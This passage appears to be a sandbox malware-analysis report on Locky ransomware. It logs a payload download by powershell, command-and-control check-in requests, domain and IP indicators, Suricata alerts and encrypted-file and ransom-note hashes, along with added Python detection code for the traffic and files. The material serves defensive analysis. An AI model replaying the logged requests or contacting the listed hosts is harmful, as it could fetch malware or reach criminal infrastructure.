- cmd.exe /C del /Q /F "%TEMP%\sysE5A3.tmp" (PID: 1060)
Network Analysis
DNS Requests
Domain | Address | Registrar | Country |
---|---|---|---|
ciscobinary.openh264.org | 184.50.238.219 | - | United States |
dsybuxulplscgeonv.xyz | - | - | - |
yitmxwhryykuuj.click | - | - | - |
taulmkeuktvxhe.xyz | - | - | - |
tyoycmkymaty.pl | - | - | - |
jhomitevd2abj3fk.onion.to | 185.100.85.150 | - | Romania |
www.injusticeil.top | 172.245.9.41 | - | United States |
udynanrpxqbxrosop.click | - | - | - |
jrhkejh.click | - | - | - |
ovpgfkt.info | - | - | - |
www.torproject.org | 138.201.14.197 | - | Germany |
jbajudsmkrurhnyu.pl | - | - | - |
jdptstkrjiowdqvgi.pw | 208.100.26.234 | - | United States |
jhomitevd2abj3fk.tor2web.org | 38.229.70.4 | - | United States |
en.wikipedia.org | 91.198.174.192 | - | Netherlands |
pccwuntpqx.click | - | - | - |
efympeet.xyz | - | - | - |
Contacted Hosts
IP Address | Port/Protocol | Associated Process | Details |
---|---|---|---|
172.245.9.41 | 80 TCP | powershell.exe PID: 2360 | United States, ASN: 36352 (ColoCrossing) |
91.200.14.124 | 80 TCP | roaming.exe PID: 2696 | Ukraine, ASN: 35804 (PP SKS-Lugan) |
185.102.136.77 | 80 TCP | roaming.exe PID: 2696 | Russian Federation |
52.32.150.180 | 443 TCP | firefox.exe PID: 2760 | United States |
52.84.13.157 | 443 TCP | firefox.exe PID: 2760 | United States |
192.122.185.121 | 443 TCP | firefox.exe PID: 2760 | United States, ASN: 237 (Merit Network Inc.) |
192.122.185.123 | 443 TCP | firefox.exe PID: 2760 | United States, ASN: 237 (Merit Network Inc.) |
Contacted Countries
HTTP Traffic
Endpoint | Request | URL | |
---|---|---|---|
172.245.9.41:80 (www.injusticeil.top) | GET | www.injusticeil.top/user.php?f=2.dat | GET /user.php?f=2.dat HTTP/1.1 Host: www.injusticeil.top Connection: Keep-Alive |
91.200.14.124:80 | POST | 91.200.14.124/apache_handler.php | POST /apache_handler.php HTTP/1.1 Accept: */* Accept-Language: en-us Referer: http://91.200.14.124/ x-requested-with: XMLHttpRequest Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate Cache-Control: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 91.200.14.124 Content-Length: 561 Connection: Keep-Alive |
185.102.136.77:80 | POST | 185.102.136.77/apache_handler.php | POST /apache_handler.php HTTP/1.1 Accept: */* Accept-Language: en-us Referer: http://185.102.136.77/ x-requested-with: XMLHttpRequest Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate Cache-Control: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 185.102.136.77 Content-Length: 561 Connection: Keep-Alive |
91.200.14.124:80 | POST | 91.200.14.124/apache_handler.php | POST /apache_handler.php HTTP/1.1 Accept: */* Accept-Language: en-us Referer: http://91.200.14.124/ x-requested-with: XMLHttpRequest Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate Cache-Control: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 91.200.14.124 Content-Length: 561 Connection: Keep-Alive |
185.102.136.77:80 | POST | 185.102.136.77/apache_handler.php | POST /apache_handler.php HTTP/1.1 Accept: */* Accept-Language: en-us Referer: http://185.102.136.77/ x-requested-with: XMLHttpRequest Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate Cache-Control: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 185.102.136.77 Content-Length: 561 Connection: Keep-Alive |
91.200.14.124:80 | POST | 91.200.14.124/apache_handler.php | POST /apache_handler.php HTTP/1.1 Accept: */* Accept-Language: en-us Referer: http://91.200.14.124/ x-requested-with: XMLHttpRequest Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate Cache-Control: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 91.200.14.124 Content-Length: 561 Connection: Keep-Alive |
184.50.238.219:80 (ciscobinary.openh264.org) | GET | ciscobinary.openh264.org/openh264-win32-v1.3.zip | GET /openh264-win32-v1.3.zip HTTP/1.1 Host: ciscobinary.openh264.org User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:35.0) Gecko/20100101 Firefox/35.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: de,en-US;q=0.7,en;q=0.3 Connection: keep-alive |
Memory Forensics
String | Context | Stream UID |
---|---|---|
http://nsis.sf.net/nsis_error | Domain/IP reference | 00037821-00000600-47529-60-0040311B |
Suricata Alerts
Event | Category | Description | SID |
---|---|---|---|
local -> 8.8.8.8:53 (UDP) | Potentially Bad Traffic | ET DNS Query to a *.pw domain - Likely Hostile | 2016778 |
local -> 8.8.8.8:53 (UDP) | Potentially Bad Traffic | ET DNS Query to a *.pw domain - Likely Hostile | 2016778 |
local -> 8.8.8.8:53 (UDP) | Potentially Bad Traffic | ET DNS Query to a *.pw domain - Likely Hostile | 2016778 |
local -> 8.8.8.8:53 (UDP) | A Network Trojan was detected | ET TROJAN ABUSE.CH Locky Payment Domain Detected | 2023329 |
local -> 8.8.8.8:53 (UDP) | Potentially Bad Traffic | ET POLICY DNS Query to .onion proxy Domain (tor2web) | 2015576 |
local -> 8.8.8.8:53 (UDP) | A Network Trojan was detected | ET TROJAN ABUSE.CH Locky Payment Domain Detected | 2023329 |
local -> 8.8.8.8:53 (UDP) | Potentially Bad Traffic | ET POLICY DNS Query to .onion proxy Domain (onion.to) | 2020116 |
local -> 8.8.8.8:53 (UDP) | A Network Trojan was detected | ET TROJAN ABUSE.CH Locky Payment Domain Detected | 2023329 |
local -> 8.8.8.8:53 (UDP) | Potentially Bad Traffic | ET POLICY DNS Query to .onion proxy Domain (tor2web) | 2015576 |
local -> 91.200.14.124:80 (TCP) | A Network Trojan was detected | ETPRO TROJAN Locky CnC checkin Aug 03 2016 | 2821471 |
local -> 91.200.14.124:80 (TCP) | A Network Trojan was detected | ETPRO TROJAN Locky CnC checkin Aug 03 2016 M2 | 2821569 |
local -> 185.102.136.77:80 (TCP) | A Network Trojan was detected | ETPRO TROJAN Locky CnC checkin Aug 03 2016 | 2821471 |
local -> 91.200.14.124:80 (TCP) | A Network Trojan was detected | ETPRO TROJAN Ransomware Locky CnC Beacon Oct 3 | 2822473 |
local -> 185.102.136.77:80 (TCP) | A Network Trojan was detected | ETPRO TROJAN Locky CnC checkin Aug 03 2016 M2 | 2821569 |
local -> 91.200.14.124:80 (TCP) | A Network Trojan was detected | ETPRO TROJAN Locky CnC checkin Aug 03 2016 | 2821471 |
local -> 185.102.136.77:80 (TCP) | A Network Trojan was detected | ETPRO TROJAN Ransomware Locky CnC Beacon Oct 3 | 2822473 |
local -> 91.200.14.124:80 (TCP) | A Network Trojan was detected | ETPRO TROJAN Locky CnC checkin Aug 03 2016 M2 | 2821569 |
local -> 91.200.14.124:80 (TCP) | A Network Trojan was detected | ETPRO TROJAN Ransomware Locky CnC Beacon Oct 3 | 2822473 |
local -> 91.200.14.124:80 (TCP) | A Network Trojan was detected | ETPRO TROJAN Locky CnC checkin Aug 03 2016 | 2821471 |
local -> 185.102.136.77:80 (TCP) | A Network Trojan was detected | ETPRO TROJAN Locky CnC checkin Aug 03 2016 | 2821471 |
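The Suricata hits above come down to two network patterns: POSTs to /apache_handler.php that carry an XMLHttpRequest header and a form-encoded body toward a bare-IP host whose Referer is its own root, and DNS lookups for .pw names and for tor2web-style gateways (onion.to, tor2web) that front Locky's .onion payment page. The Python below is an added example, not code from Hybrid Analysis or from the Emerging Threats rule set; the raw requests and query names are constructed to mirror the HTTP table and alerts on this page, and the trait weights, the alert threshold and the gateway-suffix list are this example's assumptions.

```python
"""Detection logic for the Locky network patterns flagged in this report.

Added example; not code from Hybrid Analysis or the Emerging Threats rules.
SAMPLE_REQUESTS and SAMPLE_DNS are constructed to mirror the HTTP table and
Suricata alerts above. The trait weights, the alert threshold and the
gateway-suffix list are this example's assumptions.
"""
import re
from typing import Dict, List, Optional, Tuple

# Clearnet-to-Tor gateway suffixes. The Suricata rules above name tor2web and
# onion.to; the remaining entries are assumptions for illustration.
ONION_PROXY_SUFFIXES = (".onion.to", ".tor2web.org", ".onion.link", ".onion.cab")


def parse_http_request(raw: str) -> Tuple[str, str, Dict[str, str]]:
    """Split a raw HTTP/1.x request into (method, path, headers).

    Header names are lower-cased so 'x-requested-with' matches regardless of
    case; anything after the first blank line (the body) is ignored.
    """
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return method, path, headers


def locky_checkin_score(raw: str) -> int:
    """Score a request against the check-in traffic captured in this report.

    0 means not a candidate. A POST to /apache_handler.php is the gate and
    scores 1; each further trait seen in the captured requests adds 1.
    """
    method, path, h = parse_http_request(raw)
    if method != "POST" or not path.endswith("/apache_handler.php"):
        return 0
    score = 1
    host = h.get("host", "")
    # Referer is the bare host root, exactly as captured ("Referer: http://<ip>/").
    if host and h.get("referer") == f"http://{host}/":
        score += 1
    if h.get("x-requested-with") == "XMLHttpRequest":
        score += 1
    if h.get("content-type", "").startswith("application/x-www-form-urlencoded"):
        score += 1
    # Host is an IPv4 literal rather than a hostname.
    if re.fullmatch(r"\d{1,3}(\.\d{1,3}){3}", host):
        score += 1
    return score


def classify_dns_query(qname: str) -> Optional[str]:
    """Label query names the report's DNS alerts treat as suspicious, else None."""
    name = qname.rstrip(".").lower()
    if name.endswith(".pw"):
        return "pw-tld"
    if any(name.endswith(suffix) for suffix in ONION_PROXY_SUFFIXES):
        return "onion-proxy"
    return None


def scan_events(http_requests: List[str], dns_queries: List[str]) -> List[Tuple[str, str]]:
    """Run both detectors and return (label, evidence) pairs in input order."""
    findings: List[Tuple[str, str]] = []
    for raw in http_requests:
        # Gate plus at least two corroborating traits (threshold is an assumption).
        if locky_checkin_score(raw) >= 3:
            _, _, h = parse_http_request(raw)
            findings.append(("locky-checkin", h.get("host", "?")))
    for q in dns_queries:
        label = classify_dns_query(q)
        if label:
            findings.append((label, q))
    return findings


# Constructed samples modelled on the report's HTTP requests and DNS alerts.
SAMPLE_REQUESTS = [
    # Check-in as captured: POST, XHR header, form body, referer = host root, bare IP.
    "POST /apache_handler.php HTTP/1.1\r\nAccept: */*\r\nReferer: http://91.200.14.124/\r\n"
    "x-requested-with: XMLHttpRequest\r\nContent-Type: application/x-www-form-urlencoded\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0)\r\n"
    "Host: 91.200.14.124\r\nContent-Length: 561\r\n\r\n",
    # Firefox's own OpenH264 plugin download from the same capture (reported clean).
    "GET /openh264-win32-v1.3.zip HTTP/1.1\r\nHost: ciscobinary.openh264.org\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:35.0) Gecko/20100101 Firefox/35.0\r\n\r\n",
    # Same path, none of the corroborating traits: stays below threshold.
    "POST /apache_handler.php HTTP/1.1\r\nHost: example.org\r\nContent-Type: application/json\r\n\r\n{}",
]
SAMPLE_DNS = ["example.pw", "abcdefghijklmnop.onion.to", "www.example.com", "xyz.tor2web.org"]

if __name__ == "__main__":
    for label, evidence in scan_events(SAMPLE_REQUESTS, SAMPLE_DNS):
        print(f"{label:14s} {evidence}")
```

The gate-plus-score structure matters: the path alone is a weak signal (any PHP handler can be called apache_handler.php), so the third sample, a POST to the same path without the XHR header, the root Referer or a bare-IP host, stays below the threshold, while the captured check-in scores on every trait.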
Extracted Strings
Extracted Files
Displaying 25 extracted file(s). The remaining 211 file(s) are available in the full version and XML/JSON reports.
Clean (1)

gmpopenh264.dll
- Size: 604KiB (617984 bytes)
- Type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
- AV Scan Result: 0/80
- Runtime Process: firefox.exe (PID: 2760)
- MD5: fa0e6fec79fa41c6744e1e03a1401154
- SHA1: 6f5828d27b710057ade7849ebe5eccf204540c28
- SHA256: f2a7b0ef96f80d6fef9e64bf685edd6e6718cc3f40c829cc3845c8afd929a546

Informative (24)

nav.css
- Size: 5.4KiB (5555 bytes)
- Type: ASCII text
- Runtime Process: eXe (PID: 2708)
- MD5: b873ad63e8cfade1bad4f02857f0748d
- SHA1: 7dfdb08c95b78bdde77a008711e94e8c1973bcc5
- SHA256: c602d361f3a7810acb5f6dc740457f2e8974c60a2eafdbbc741238a08b0c137f

5DYGW9JJ-XIPQ-SEFB-D62E-8CABDDA95F33.odin
- Size: 49KiB (50044 bytes)
- Type: data
- MD5: 5508a2a86bf72fb5485b5be36c1573cc
- SHA1: 84a5c7eec4ea38f45bcc5ad31f2c4ea52be02be3
- SHA256: 08091e1a22e91bf80a9e90c7b719e7c69035f4445d016cc7d5c56d28695ea033

_28_HOWDO_text.html
- Size: 9.3KiB (9482 bytes)
- Type: HTML document, UTF-8 Unicode text, with very long lines
- MD5: d8f4fac7c57e62bcd93176399fc48af8
- SHA1: eb169e9921deba92804217164627b66c03808ef8
- SHA256: 16552fb073ef206f57e9fba5a65265d9711f966a2c5069256f64843e4abf03a2

5DYGW9JJ-XIPQ-SEFB-7359-764CD16FFCE7.odin
- Size: 29KiB (29701 bytes)
- Type: data
- MD5: d62eb5403afbd99fead0458375b101bb
- SHA1: 00bb4d5b7d39a54fe78a6dd1eb4871f54b52c26c
- SHA256: 3aea23f088ab68dcff6792b3a14fd938473f49b8694eae7b5e71193f2c3e1848

5DYGW9JJ-XIPQ-SEFB-9716-0A946C3CE4BE.odin
- Size: 932B (932 bytes)
- Type: data
- MD5: 1bd6d4607c36393e637c0c653c19649e
- SHA1: 8d6068c2b2e8db84d0b6083447653fb52a1856c6
- SHA256: 9560a9be9d871cb3faca40dc52a3fe246b86892043a1fe62d2308df924f177cd

home-&-garden
- Size: 14KiB (14346 bytes)
- Type: HTML document, ASCII text, with CRLF line terminators
- Runtime Process: eXe (PID: 2708)
- MD5: c6df9f876ad24906f3fc5a0541b5dc82
- SHA1: eedfeedbe308fa432d7e76836e94a3e614b4671d
- SHA256: 1193bc37b0fb028631ae898023c1d61dd8578c335b53ca68722a066d856df751

_21_HOWDO_text.html
- Size: 9.3KiB (9482 bytes)
- Type: HTML document, UTF-8 Unicode text, with very long lines
- MD5: d8f4fac7c57e62bcd93176399fc48af8
- SHA1: eb169e9921deba92804217164627b66c03808ef8
- SHA256: 16552fb073ef206f57e9fba5a65265d9711f966a2c5069256f64843e4abf03a2

healthreport.sqlite
- Size: 1.1MiB (1146880 bytes)
- Type: SQLite 3.x database, user version 1
- Runtime Process: firefox.exe (PID: 2760)
- MD5: b1be5c2d296473c1f88ed38e4a8b31ba
- SHA1: b20fe84ab183aa37fd744492a9775a94856a1f7d
- SHA256: 4ecca893ebd7ef80e7f1fa048148276c989d0fc163c62ced5e2c2a55f479d593

5DYGW9JJ-XIPQ-SEFB-4DDE-F004BFD77AEE.odin
- Size: 3.1KiB (3132 bytes)
- Type: data
- MD5: 63df4fe124fa47e6971140f9e3a05109
- SHA1: e8c57a06ddc2f0beb05b304ce536cf68092450a4
- SHA256: 50069b9ab8a4267a60939222fe7c5c3f56b9f0cc14e69b732f3e109398fd9afd

5DYGW9JJ-XIPQ-SEFB-5AFB-0FF7A6D5EE86.odin
- Size: 3.9MiB (4114710 bytes)
- Type: data
- MD5: e5ea981f09b77336f8a6492c7d65fae1
- SHA1: 8eb3e4561b441045e25836a2d4a6d7b78ba8db22
- SHA256: 436e07044bb0042128493fc2f36c8ff1aae3003ffa814ad12f8d9842576e3ce5

_22_HOWDO_text.html
- Size: 9.3KiB (9482 bytes)
- Type: HTML document, UTF-8 Unicode text, with very long lines
- MD5: d8f4fac7c57e62bcd93176399fc48af8
- SHA1: eb169e9921deba92804217164627b66c03808ef8
- SHA256: 16552fb073ef206f57e9fba5a65265d9711f966a2c5069256f64843e4abf03a2

healthreport.sqlite-wal
- Size: 608KiB (623080 bytes)
- Type: data
- Runtime Process: firefox.exe (PID: 2760)
- MD5: 523ac571ef9e02fb2dd7fa3d106e8057
- SHA1: aa720a4037c44d9f9ea7b9601c692bfc8935fc71
- SHA256: 1ac76026640eedd02c7b05bcf819e425724b84de4c31c2543d3d659ae26190f0

5DA331CF89FC03A9797F848CD51BA54F20015C7D
- Size: 864B (864 bytes)
- Type: data
- Runtime Process: firefox.exe (PID: 2760)
- MD5: 2237d5ee2cb47822c285c501779b4da1
- SHA1: 6192cc9040dc97393f41160aae90adc526d4e515
- SHA256: bb07499adf3205db464dbd1b811e29b23b07a4fae2356cd55405fdb706b4560a

5DYGW9JJ-XIPQ-SEFB-F034-96B64D825B9A.odin
- Size: 2.3KiB (2401 bytes)
- Type: data
- MD5: eb9a73130f93b4349fadcc3aeafdcf1d
- SHA1: 915f8fd7bc609b3fd586ee3b1c2455ec8369f2b5
- SHA256: 0121faa0530d2e0ece2834b25128276f7b7541b0489d173939560950076e19e3

recovery.js.tmp
- Size: 1.8KiB (1844 bytes)
- Type: ASCII text, with very long lines, with no line terminators
- Runtime Process: firefox.exe (PID: 2760)
- MD5: 0a45e5e2ce4af5e47e5f66213ef00ae7
- SHA1: b7aada608e1b050fc10b9faa116aadabc9b8b0a9
- SHA256: 63fbfac56238ce944e4088db5afe7e929e90868f3eea3b313de0a6a35673a917

goog-phish-shavar.pset
- Size: 436KiB (446550 bytes)
- Type: data
- Runtime Process: firefox.exe (PID: 2760)
- MD5: b5ab6cb9f7a70a95b464bb8a9de221bf
- SHA1: a0be00a1bf4419dc1cd7964db151e096e64fa5f6
- SHA256: 1c5245ca5048423e50ff76e1ca337a270fa5e662e1ba4b8462cf0d814e462d91

5DYGW9JJ-XIPQ-SEFB-7AFD-E18982230556.odin
- Size: 1.6KiB (1647 bytes)
- Type: data
- MD5: 879ea81ecface3d8547b223091f680b9
- SHA1: 18d3c76ef055509d2e3a35f37da0d06d0b3c0bf4
- SHA256: 77aef9bbaeeb844572478d475a96f015eeebb425b18a23c7e640b327d19405a2

cookies.sqlite-wal
- Size: 480KiB (491912 bytes)
- Type: data
- Runtime Process: firefox.exe (PID: 2760)
- MD5: 356a994babf21f10496b1d3bae2b71a9
- SHA1: b11ce421050f50a4bc56eefebe10167223dbbd4c
- SHA256: 5824502610933d6ace0af7b6ca5b44e8093f75e4e61d2f9a8202c8b21633b441

6DF4C247EB188DBE3AA7FEFB8B83F5C21339C17F
- Size: 5.3KiB (5422 bytes)
- Type: data
- Runtime Process: firefox.exe (PID: 2760)
- MD5: 6eeee4ec2efa8027d1af669e70f34860
- SHA1: 8e4419a9e87aa16e8199bbca47ca02c40ca3cd5b
- SHA256: caac4934b25e5144adff3243b2f3201312e3078b471d484adfc3e2d328df82f9

AppAssocReg.dll
- Size: 4.5KiB (4608 bytes)
- Runtime Process: helper.exe (PID: 600)
- MD5: 1145a8e66064f36640e62e7ed58472bd
- SHA1: e0416facc56fd30581f15bda522216ba586736ba
- SHA256: 386c19010f04c04a3a0071cce09f7a2c10393392c7ca5877becc437ad9d31d37

CityHash.dll
- Size: 44KiB (44544 bytes)
- Runtime Process: helper.exe (PID: 600)
- MD5: 737379945745bb94f8a0dadcc18cad8d
- SHA1: 6a1f497b4dc007f5935b66ec83b00e5a394332c6
- SHA256: d3d7b3d7a7941d66c7f75257be90b12ac76f787af42cd58f019ce0280972598a

System.dll
- Size: 11KiB (11264 bytes)
- Runtime Process: eXe (PID: 2708)
- MD5: 959ea64598b9a3e494c00e8fa793be7e
- SHA1: 40f284a3b92c2f04b1038def79579d4b3d066ee0
- SHA256: 03cd57ab00236c753e7ddeee8ee1c10839ace7c426769982365531042e1f6f8b

ShellLink.dll
- Size: 4.5KiB (4608 bytes)
- Runtime Process: helper.exe (PID: 600)
- MD5: d62d3e349689811f838dd10fb216eba1
- SHA1: edcafd517860cb6b4bd299e20b17ad74a6fa2a5d
- SHA256: 5d103419245e2a5f124a96cace25d6836b2398edc0aa3919829b0fd6ad8b5d6a

Roaming.eXe
- Size: 264KiB (270239 bytes)
- Type: PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
- Runtime Process: powershell.exe (PID: 2360)
- MD5: 0a155c07ac42cacd00f4aff5b490a9f1
- SHA1: 8a5fdb34ba36b2a1965ab71d4b09666e06b10702
- SHA256: 356ce5058314908fd8c2cb86df05e32a0baac6fc775fa93403bf1d9552917220
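The dropped-file list holds three kinds of entries: encrypted files renamed to a five-group name ending in .odin, where the first three groups (5DYGW9JJ-XIPQ-SEFB) are the same for every encrypted file in this run; ransom notes named _NN_HOWDO_text.html that all share one SHA-256; and browser, installer and helper files attributed to firefox.exe, helper.exe, eXe and powershell.exe. The Python below is an added example, not part of the Hybrid Analysis report; its sample entries are constructed from names, sizes and SHA-256 values in the list above, and the field names, the victim-ID reading of the name prefix and the grouping rules are this example's assumptions.

```python
"""Triage of a sandbox dropped-file list for Locky '.odin' artifacts.

Added example; not code from the Hybrid Analysis report. SAMPLE_FILES is
constructed from names, sizes and SHA-256 values shown in this report. The
field names, the victim-ID reading of the file-name prefix and the grouping
rules are this example's assumptions.
"""
import re
from collections import defaultdict
from typing import Dict, List, NamedTuple, Optional


class DroppedFile(NamedTuple):
    name: str
    size: int
    sha256: str
    process: Optional[str]  # sandbox "Runtime Process", None when not listed


# Encrypted-file name shape in this report: five upper-case alphanumeric groups,
# 8-4-4-4-12, then '.odin'. The first three groups are identical for every
# encrypted file in the run, so they are read here as a per-victim ID.
ODIN_NAME = re.compile(
    r"^([A-Z0-9]{8}-[A-Z0-9]{4}-[A-Z0-9]{4})-([A-Z0-9]{4}-[A-Z0-9]{12})\.odin$"
)
# Ransom note shape in this report: _<number>_HOWDO_text.html
RANSOM_NOTE = re.compile(r"^_\d+_HOWDO_text\.html$")


def victim_id(name: str) -> Optional[str]:
    """Return the 8-4-4 prefix of an .odin file name, or None if it does not match."""
    m = ODIN_NAME.match(name)
    return m.group(1) if m else None


def triage(files: List[DroppedFile]) -> Dict[str, object]:
    """Split a dropped-file list into encrypted files, ransom notes and the rest.

    Ransom notes are keyed by SHA-256 so that copies dropped under different
    names (one per directory the ransomware touched) collapse to one content hash.
    """
    encrypted: Dict[str, List[DroppedFile]] = defaultdict(list)
    notes: Dict[str, List[str]] = defaultdict(list)
    by_process: Dict[str, List[str]] = defaultdict(list)
    for f in files:
        vid = victim_id(f.name)
        if vid:
            encrypted[vid].append(f)
        elif RANSOM_NOTE.match(f.name):
            notes[f.sha256].append(f.name)
        else:
            by_process[f.process or "unattributed"].append(f.name)
    return {
        "victim_ids": sorted(encrypted),
        "encrypted_count": sum(len(v) for v in encrypted.values()),
        "encrypted_bytes": sum(f.size for v in encrypted.values() for f in v),
        "ransom_notes": {h: sorted(names) for h, names in notes.items()},
        "by_process": {p: sorted(names) for p, names in by_process.items()},
    }


# Constructed from entries in the report's "Extracted Files" list.
SAMPLE_FILES = [
    DroppedFile("5DYGW9JJ-XIPQ-SEFB-D62E-8CABDDA95F33.odin", 50044,
                "08091e1a22e91bf80a9e90c7b719e7c69035f4445d016cc7d5c56d28695ea033", None),
    DroppedFile("5DYGW9JJ-XIPQ-SEFB-7359-764CD16FFCE7.odin", 29701,
                "3aea23f088ab68dcff6792b3a14fd938473f49b8694eae7b5e71193f2c3e1848", None),
    DroppedFile("5DYGW9JJ-XIPQ-SEFB-9716-0A946C3CE4BE.odin", 932,
                "9560a9be9d871cb3faca40dc52a3fe246b86892043a1fe62d2308df924f177cd", None),
    DroppedFile("5DYGW9JJ-XIPQ-SEFB-5AFB-0FF7A6D5EE86.odin", 4114710,
                "436e07044bb0042128493fc2f36c8ff1aae3003ffa814ad12f8d9842576e3ce5", None),
    DroppedFile("_28_HOWDO_text.html", 9482,
                "16552fb073ef206f57e9fba5a65265d9711f966a2c5069256f64843e4abf03a2", None),
    DroppedFile("_21_HOWDO_text.html", 9482,
                "16552fb073ef206f57e9fba5a65265d9711f966a2c5069256f64843e4abf03a2", None),
    DroppedFile("_22_HOWDO_text.html", 9482,
                "16552fb073ef206f57e9fba5a65265d9711f966a2c5069256f64843e4abf03a2", None),
    DroppedFile("healthreport.sqlite", 1146880,
                "4ecca893ebd7ef80e7f1fa048148276c989d0fc163c62ced5e2c2a55f479d593", "firefox.exe"),
    DroppedFile("Roaming.eXe", 270239,
                "356ce5058314908fd8c2cb86df05e32a0baac6fc775fa93403bf1d9552917220", "powershell.exe"),
]

if __name__ == "__main__":
    for key, value in triage(SAMPLE_FILES).items():
        print(f"{key}: {value}")
```

Keying the notes by hash is what makes the three _NN_HOWDO_text.html entries read as one artifact rather than three, and grouping the remaining files by the process the sandbox attributed them to separates the Firefox profile noise from the Nullsoft installer that powershell.exe wrote.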
Notifications
Runtime
- Added comment to Virus Total report
- Dropped file "Roaming.eXe" was unknown to VirusTotal, submitted file for scanning (Permalink: "https://www.virustotal.com/file/356ce5058314908fd8c2cb86df05e32a0baac6fc775fa93403bf1d9552917220/analysis/1477113583/")
- Dropped file "_28_HOWDO_text.html" was unknown to VirusTotal, submitted file for scanning (Permalink: "https://www.virustotal.com/file/16552fb073ef206f57e9fba5a65265d9711f966a2c5069256f64843e4abf03a2/analysis/1477113575/")
- Dropped file "home-&-garden" was unknown to VirusTotal, submitted file for scanning (Permalink: "https://www.virustotal.com/file/1193bc37b0fb028631ae898023c1d61dd8578c335b53ca68722a066d856df751/analysis/1477113576/")
- Not all file accesses are visible for cmd.exe (PID: 1060)
- Not all file accesses are visible for cmd.exe (PID: 2356)
- Not all file accesses are visible for eXe (PID: 2696)
- Not all file accesses are visible for eXe (PID: 2708)
- Not all file accesses are visible for firefox.exe (PID: 2760)
- Not all file accesses are visible for helper.exe (PID: 600)
- Not all file accesses are visible for powershell.exe (PID: 2360)
- Not all file accesses are visible for wscript.exe (PID: 1264)
- Not all sources for signature ID "binary-0" are available in the report
- Not all sources for signature ID "mutant-0" are available in the report
- Parsed the maximum number of dropped files (20), report might not contain information about some dropped files
- Some low-level details are hidden from the report due to oversize